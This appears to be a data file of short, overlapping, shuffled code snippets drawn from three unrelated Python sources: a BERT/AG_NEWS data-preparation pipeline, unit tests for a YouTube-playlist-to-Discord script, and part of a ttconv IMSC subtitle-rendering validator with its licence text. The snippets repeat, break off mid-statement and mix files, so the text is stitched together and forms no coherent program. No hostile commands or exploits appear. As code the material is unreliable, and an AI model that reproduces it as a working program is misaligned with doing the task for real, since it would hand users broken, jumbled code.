"transformers import ( BertModel, BertTokenizer, AdamW ) import argparse import os from tqdm",
"Logging for debugging \"\"\" for a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method",
"BertModel, BertTokenizer, AdamW ) import argparse import os from tqdm import tqdm import",
"run_pipeline( options ) # if __name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\",",
") # if __name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\":",
"URLS import sys import argparse import logging def run_pipeline(input_options): \"\"\" This method downloads",
"from torch import nn from torch.utils.data import Dataset, DataLoader from transformers import (",
"sys import argparse import logging def run_pipeline(input_options): \"\"\" This method downloads the dataset",
"\"\"\" Method called from entry point to execute the pipeline \"\"\" print(\"Running data",
"if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching",
"run_pipeline_component(options): \"\"\" Method called from entry point to execute the pipeline \"\"\" print(\"Running",
"from entry point to execute the pipeline \"\"\" print(\"Running data prep job from",
"for debugging \"\"\" for a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called",
"entry point to execute the pipeline \"\"\" print(\"Running data prep job from container\")",
"defaultdict import numpy as np import pandas as pd import torch import torch.nn.functional",
"torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse import",
"__name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\", # \"VOCAB_FILE_URL\":",
"data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__",
"DataLoader from transformers import ( BertModel, BertTokenizer, AdamW ) import argparse import os",
"import nn from torch.utils.data import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer,",
"parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]):",
"from collections import defaultdict import numpy as np import pandas as pd import",
"the dataset and extract it along with the vocab file :param input_options: Input",
"\"\"\" for a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from entry",
"import argparse import logging def run_pipeline(input_options): \"\"\" This method downloads the dataset and",
"torch.nn.functional as F from sklearn.model_selection import train_test_split from torch import nn from torch.utils.data",
"along with the vocab file :param input_options: Input arg parameters \"\"\" dataset_tar =",
"file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a in options.items(): print(a)",
"debugging \"\"\" for a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from",
"AdamW ) import argparse import os from tqdm import tqdm import requests from",
"== \"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\", # \"VOCAB_FILE_URL\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\"",
"import defaultdict import numpy as np import pandas as pd import torch import",
"( BertModel, BertTokenizer, AdamW ) import argparse import os from tqdm import tqdm",
"= extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with",
"called from entry point to execute the pipeline \"\"\" print(\"Running data prep job",
"from torch.utils.data import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW )",
"logging def run_pipeline(input_options): \"\"\" This method downloads the dataset and extract it along",
"BertTokenizer, AdamW ) import argparse import os from tqdm import tqdm import requests",
"import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys",
"requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise",
"arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not",
"import URLS import sys import argparse import logging def run_pipeline(input_options): \"\"\" This method",
"from tqdm import tqdm import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification",
"not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as",
"import torch import torch.nn.functional as F from sklearn.model_selection import train_test_split from torch import",
"F from sklearn.model_selection import train_test_split from torch import nn from torch.utils.data import Dataset,",
"import argparse import os from tqdm import tqdm import requests from torchtext.utils import",
"execute the pipeline \"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline(",
"train_test_split from torch import nn from torch.utils.data import Dataset, DataLoader from transformers import",
"\"\"\" This method downloads the dataset and extract it along with the vocab",
"as np import pandas as pd import torch import torch.nn.functional as F from",
"Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if",
"allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in",
"numpy as np import pandas as pd import torch import torch.nn.functional as F",
"def run_pipeline(input_options): \"\"\" This method downloads the dataset and extract it along with",
"extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"],",
"= requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else:",
"filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the",
"URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True)",
"collections import defaultdict import numpy as np import pandas as pd import torch",
"open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab file\")",
"print(a) def run_pipeline_component(options): \"\"\" Method called from entry point to execute the pipeline",
"\"\"\" Logging for debugging \"\"\" for a in options.items(): print(a) def run_pipeline_component(options): \"\"\"",
"print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if",
"np import pandas as pd import torch import torch.nn.functional as F from sklearn.model_selection",
"import pandas as pd import torch import torch.nn.functional as F from sklearn.model_selection import",
"os from tqdm import tqdm import requests from torchtext.utils import download_from_url, extract_archive from",
"def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a in options.items(): print(a) def",
"and extract it along with the vocab file :param input_options: Input arg parameters",
"the pipeline \"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options",
"import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW ) import argparse",
"the vocab file :param input_options: Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"],",
"f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options): \"\"\"",
"PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a in options.items(): print(a) def run_pipeline_component(options):",
"Method called from entry point to execute the pipeline \"\"\" print(\"Running data prep"
] |
[
"contains five videos, added by two different users, # and some videos don't",
"to test various features of the script. # It contains five videos, added",
"r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r,",
"features of the script. # It contains five videos, added by two different",
"= main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920)",
"class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r =",
"users, # and some videos don't have maxres thumbnails. # This playlist shouldn't",
"test, but used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item",
"['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with",
"import main # A test playlist created by myself to test various features",
"This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving",
"main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed =",
"playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around",
"and some videos don't have maxres thumbnails. # This playlist shouldn't be changed.",
"main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def",
"return embed # Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self):",
"various features of the script. # It contains five videos, added by two",
"but used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item =",
"created by myself to test various features of the script. # It contains",
"revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST)",
"import typing import main # A test playlist created by myself to test",
"a test, but used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST)",
"of the script. # It contains five videos, added by two different users,",
"main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff",
"by two different users, # and some videos don't have maxres thumbnails. #",
"# Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed =",
"= epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord",
"I guess. import unittest import typing import main # A test playlist created",
"= main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase):",
"playlist created by myself to test various features of the script. # It",
"in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch",
"Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self):",
"be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and",
"typing import main # A test playlist created by myself to test various",
"playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item)",
"embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord Embeds. class",
"Unit tests, I guess. import unittest import typing import main # A test",
"typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering. class",
"# Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self):",
"= get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__",
"# and some videos don't have maxres thumbnails. # This playlist shouldn't be",
"self.assertEqual(len(filtered), 2) # Not a test, but used in tests below. def get_playlist_item_embed(pos:",
"Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r",
"YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5)",
"the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def",
"guess. import unittest import typing import main # A test playlist created by",
"myself to test various features of the script. # It contains five videos,",
"filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r",
"videos don't have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final",
"'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def",
"import unittest import typing import main # A test playlist created by myself",
"by myself to test various features of the script. # It contains five",
"functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r =",
"= main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used in tests",
"# Not a test, but used in tests below. def get_playlist_item_embed(pos: int): r",
"test playlist created by myself to test various features of the script. #",
"class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed =",
"shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube",
"epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord Embeds.",
"def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt'])",
"Not a test, but used in tests below. def get_playlist_item_embed(pos: int): r =",
"'(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__ == '__main__': unittest.main()",
"r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test,",
"embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if",
"different users, # and some videos don't have maxres thumbnails. # This playlist",
"filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used in",
"five videos, added by two different users, # and some videos don't have",
"# This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions",
"tests, I guess. import unittest import typing import main # A test playlist",
"A test playlist created by myself to test various features of the script.",
"def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered",
"some videos don't have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST:",
"1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used in tests below. def",
"= main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but",
"test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a",
"# A test playlist created by myself to test various features of the",
"Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed",
"self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__ == '__main__':",
"videos, added by two different users, # and some videos don't have maxres",
"# Unit tests, I guess. import unittest import typing import main # A",
"main # A test playlist created by myself to test various features of",
"main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used in tests below.",
"= r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return",
"int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] =",
"tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch =",
"with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)')",
"embed # Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed",
"video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self):",
"script. # It contains five videos, added by two different users, # and",
"# It contains five videos, added by two different users, # and some",
"playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with the",
"r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch",
"unittest import typing import main # A test playlist created by myself to",
"Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1)",
"and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def",
"test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered =",
"It contains five videos, added by two different users, # and some videos",
"thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing",
"around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']),",
"r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed",
"test various features of the script. # It contains five videos, added by",
"stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'],",
"added by two different users, # and some videos don't have maxres thumbnails.",
"main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered),",
"used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos]",
"test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)')",
"epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed #",
"= main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing",
"TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2)",
"main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used",
"have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb'",
"= 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase):",
"two different users, # and some videos don't have maxres thumbnails. # This",
"TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST)",
"changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video",
"get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt']",
"maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' #",
"5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) #",
"= main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed",
"def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not",
"don't have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final =",
"TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering.",
"below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item",
"self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2)",
"def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'],",
"<filename>test.py<gh_stars>1-10 # Unit tests, I guess. import unittest import typing import main #",
"the script. # It contains five videos, added by two different users, #",
"get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__ ==",
"2) # Not a test, but used in tests below. def get_playlist_item_embed(pos: int):"
] |
[
"and the following disclaimer in the documentation # and/or other materials provided with",
"WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND",
"Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index:",
"FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING,",
"<<EMAIL>>\" import typing from dataclasses import dataclass from fractions import Fraction from numbers",
"AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL",
"`(begin, ISD)`, where `ISD` is an ISD instance whose active interval starts at",
"counted? -> NO # should span and br really be included -> yes",
"front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh:",
"is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return",
"is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value",
"time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats)",
"12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1",
"typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent",
"THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL,",
"-> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t",
"return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported",
"isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for",
"without # modification, are permitted provided that the following conditions are met: #",
"Number = 0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"in binary form must reproduce the above copyright notice, # this list of",
"str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at",
"0 for element in region.dfs_iterator(): # should body elements really be excluded? ->",
"1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if",
"not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in",
"validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by",
"returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence of",
"0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d",
"= 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS =",
"PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS",
"= element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return",
"of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose active interval",
"Does the ISD contain any content class EventHandler: '''Allows a callee to inform",
"caller of events that occur during processing. Typically overridden by the caller. '''",
"excluded? -> NO # should transparent backgrounds really be counted? -> NO #",
"(c) 2021, Pearl TV LLC # # Redistribution and use in source and",
"not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if",
"def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return (",
"of ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a",
"and the following disclaimer. # 2. Redistributions in binary form must reproduce the",
"ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform",
"HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\")",
"yes for now # should br really be included -> no if isinstance(element,",
"@dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time dur_d: Number",
"class EventHandler: '''Allows a callee to inform the caller of events that occur",
"provided that the following conditions are met: # # 1. Redistributions of source",
"import Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties as",
"`ISD` is an ISD instance whose active interval starts at `begin` seconds and",
"_Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType",
"immediately before the `begin` value of the next ISD. Errors, warnings and info",
"typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator`",
